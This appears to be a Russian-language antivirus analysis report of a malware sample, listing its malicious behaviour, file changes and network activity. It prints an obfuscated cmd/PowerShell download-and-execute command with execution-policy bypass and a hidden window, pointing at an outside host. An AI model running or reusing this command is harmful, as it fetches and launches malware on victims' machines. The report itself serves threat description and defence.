Техническая информация
Вредоносные функции
Загружает и запускает на исполнение
- http://aloepolera.top/read.php?f=0.dat как %appdata%.exe
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\cmd.exe' /C "Po^WErsH^EL^L^.^exE -EXe^cuT^IoNP^Ol^IcY^ Byp^aSs^ ^-^N^O^PR^O^f^Il^e -wi^n^d^O^wst^yLe ^h^i^d^dE^N (^nEw-OBjecT sYs^TeM.N^e^t.webcLie^N^t).^DownloaD^fi^Le('http://aloepolera.top/rea...
Изменения в файловой системе
Создает следующие файлы
- %APPDATA%.exe
Сетевая активность
Подключается к
- 'al###olera.top':80
TCP
Запросы HTTP GET
- http://al###olera.top/read.php?f=#####
UDP
- DNS ASK al###olera.top
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\cmd.exe' /C "Po^WErsH^EL^L^.^exE -EXe^cuT^IoNP^Ol^IcY^ Byp^aSs^ ^-^N^O^PR^O^f^Il^e -wi^n^d^O^wst^yLe ^h^i^d^dE^N (^nEw-OBjecT sYs^TeM.N^e^t.webcLie^N^t).^DownloaD^fi^Le('http://aloepolera.top/rea...' (со скрытым окном)
